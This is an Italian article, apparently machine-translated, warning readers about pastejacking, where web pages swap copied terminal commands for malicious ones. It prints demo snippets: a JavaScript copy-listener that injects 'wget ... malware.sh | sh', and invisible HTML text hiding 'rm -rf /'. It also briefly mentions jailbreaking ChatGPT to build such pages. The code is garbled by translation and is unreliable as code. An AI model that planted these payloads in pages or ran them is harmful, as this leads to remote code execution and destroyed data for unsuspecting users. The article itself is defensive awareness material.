Perché dovresti evitare di copiare e incollare comandi da Internet? Cause, conseguenze e come affrontarle in sicurezza

In un mondo in rapida evoluzione, copiare e incollare comandi da Internet può sembrare una soluzione rapida ed efficace ai nostri problemi tecnici. Tuttavia, questa pratica può essere rischiosa, poiché può esporre la tua sicurezza e la tua privacy a minacce nascoste. Questa pratica affrettata potrebbe avere effetti negativi sui nostri dispositivi e sui nostri dati personali.

Dai computer ai telefoni cellulari, il copia e incolla è ovunque. Semplifica la vita e ti fa risparmiare tempo poiché non devi digitare lunghi comandi o script ridondanti. Tuttavia, se non stai abbastanza attento, puoi essere hackerato semplicemente copiando del codice trovato sul web e incollandolo sul tuo computer.

Attraverso questo articolo, esamineremo in dettaglio i possibili motivi per cui dovresti prendere seriamente in considerazione di non copiare e incollare comandi da Internet ed evidenziare le implicazioni sulla sicurezza e sulla privacy di questa pratica. Tratteremo anche strategie e suggerimenti per gestire queste situazioni in modo sicuro e responsabile, permettendoci di beneficiare dei vantaggi di Internet senza rischi. Impariamo come copiare e incollare può farti hackerare e cosa dovresti fare per evitare che ciò accada. Verificare Metodi comuni utilizzati dagli hacker per hackerare il tuo conto bancario.

Perché non dovresti copiare e incollare i comandi

Che tu sia nuovo alla riga di comando o che tu sia un esperto, potresti essere tentato di copiare e incollare comandi da Internet per risparmiare tempo, portare a termine il lavoro effettivo più velocemente ed essere più produttivo. Tuttavia, dovresti essere consapevole che i siti Web dannosi utilizzano effettivamente i codebox come arma per iniettare codice dannoso quando copi e incolli i comandi direttamente nel Terminale o nel Prompt dei comandi.

Questi autori malintenzionati utilizzano molti trucchi front-end per mascherare comandi dannosi dietro codice apparentemente innocuo.

ordina come sudo apt-get update && apt-get upgrade Di solito dovrebbe aggiornare i repository e aggiornare i pacchetti su Linux. Tuttavia, se non ne sei consapevole e copi e incolli questo comando direttamente nel Terminale, potresti inavvertitamente eseguire codice dannoso con privilegi di root a causa del prefisso sudo.

Nel peggiore dei casi, l'esecuzione del comando potrebbe portare alla completa acquisizione del sistema o addirittura a un attacco ransomware. Ma come fanno gli autori delle minacce a farlo? Come si possono nascondere comandi dannosi dietro codice innocuo?

Come funzionano gli exploit di codice dannoso

Questo exploit può essere implementato utilizzando codice Java Script progettato in modo intelligente o anche codice HTML di base. Java Script ha un meccanismo chiamato EventListener. Si tratta di azioni che possono verificarsi nel browser, come fare clic su un pulsante, inviare un modulo, spostare il mouse, premere tasti o ridimensionare una finestra.

Un EventListener, come suggerisce il nome, consente alla tua applicazione web di reagire a determinati eventi attivati ​​da un'azione dell'utente. Le pagine Web dannose sfruttano questo meccanismo legittimo e utile catturando l'evento in cui un utente copia del testo e sostituendo il testo innocuo con codice dannoso.

Ecco il codice exploit principale utilizzato per creare l'immagine demo:

<copione>documento.addEventListener('copia', funzione(evento) { evento.preventDefault();
 const testocopiato = "wget ​​http://localhost:8000/malware.sh | sh"; evento.AppuntiDati.setData('testo/semplice', testocopiato); });
</copione>

Ecco un'altra demo, che non richiede Java Script e utilizza HTML di base:

<p>
sudo apt-get install google-chrome-stable
<campatastile="colore:bianco;dimensione-carattere:0pt;">rm-rf /</campata></p>

Questo codice crea un testo bianco invisibile, che nasconde di fatto il comando dannoso "rm -rf /", così come il flag Crea un'interruzione di riga in modo che alcune finestre di Terminale eseguano il codice immediatamente quando lo incolli. Potresti pensare che per eseguire questo attacco sia necessaria una forte conoscenza delle competenze di programmazione e di sviluppo web, ma in realtà è molto semplice.

Anche se l'aggressore non ha alcuna conoscenza di Java Script o di sviluppo web, può farlo facilmente Crea malware con ChatGPT. Utilizzando le istruzioni giuste, è possibile farlo facilmente Jailbreak di ChatGPT E fagli creare pagine Web dannose che sfruttano questo trucco.

Come puoi proteggerti

Non esiste un modo concreto per proteggersi dagli attacchi di codici dannosi. Certo, puoi disabilitare Java Script di siti Web sospetti, ma per la loro stessa natura probabilmente non ti permetteranno di navigare senza Java Script attivato.

Inoltre, per un metodo CSS (Cascading Style Sheets), non esiste una difesa concreta contro i comandi dannosi poiché si tratta ancora di codice CSS valido (cioè non c'è errore di codifica ma l'intento è comunque dannoso). Il modo migliore per proteggersi è seguire le regole basilari dell’igiene online e riconoscere le minacce con buon senso.

Non visitare collegamenti sconosciuti e assicurati sempre di incollare il comando che copi da Internet in un editor di testo prima di incollarlo nel Terminale. Attieniti a risorse di codice legittime e affidabili per assicurarti che nessun codice dannoso sia il benvenuto nella tua riga di comando.

Inoltre, alcune applicazioni Terminale, come xfce4, sono preinstallate con la protezione copia e incolla. Verrà visualizzato un popup che ti dice esattamente cosa verrà fatto una volta incollato un comando nella finestra del prompt dei comandi. Controlla se anche il Terminale che stai utilizzando ha un meccanismo simile e attivalo. Verificare Suggerimenti essenziali per utenti avanzati di Ubuntu Linux.

L'esecuzione di codice dannoso è estremamente pericolosa

Anche se hai installato un antivirus, alcune forme di esecuzione di codice dannoso possono comunque penetrare le barriere protettive del tuo dispositivo. Questo è il motivo per cui è importante fare attenzione al codice che copi online e utilizzare misure protettive ove possibile per mantenerti al sicuro. Puoi visualizzarlo ora Risorse straordinarie per la programmazione senza codice per creare app e creare siti Web senza codice.

Vai al pulsante in alto